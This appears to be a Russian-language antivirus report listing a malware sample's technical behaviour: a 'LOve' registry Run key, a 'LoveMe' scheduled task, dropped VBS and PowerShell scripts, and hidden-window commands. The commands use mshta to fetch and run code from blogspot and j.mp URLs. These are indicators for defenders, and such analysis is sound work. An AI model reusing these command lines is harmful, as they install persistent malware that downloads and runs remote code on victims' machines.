Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'LOve' = '"mshta""http://20%1230948%1230948%20%20@blacknano1.blogspot.com/p/main.html"'
- <SYSTEM32>\tasks\loveme
- '<SYSTEM32>\ping.exe'
- '<SYSTEM32>\cmd.exe' /c mshta http://12#####%1230948@j.mp/ankasknk3asdmsk
- C:\users\public\datax.ps1
- %ALLUSERSPROFILE%\start.vbs
- C:\users\public\data\system.vbs
- 'j.#p':80
- '11#.#0.149.168':80
- DNS ASK j.#p
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' C:\Users\Public\Datax.ps1
- '<SYSTEM32>\ping.exe' ' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c mshta http://12#####%1230948@j.mp/ankasknk3asdmsk' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -command Powershell.exe C:\Users\Public\Datax.ps1;' (со скрытым окном)
- '<SYSTEM32>\schtasks.exe' /create /sc MINUTE /mo 80 /tn "LoveMe" /tr "\"mshta\" http://20############0948%20%20@blacknano2.blogspot.com/p/backup-1.html" /F' (со скрытым окном)
- '<SYSTEM32>\mshta.exe' http://12#####%1230948@j.mp/ankasknk3asdmsk
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -command Powershell.exe C:\Users\Public\Datax.ps1;
- '<SYSTEM32>\schtasks.exe' /create /sc MINUTE /mo 80 /tn "LoveMe" /tr "\"mshta\" http://20############0948%20%20@blacknano2.blogspot.com/p/backup-1.html" /F
- '%WINDIR%\microsoft.net\framework\v2.0.50727\aspnet_compiler.exe'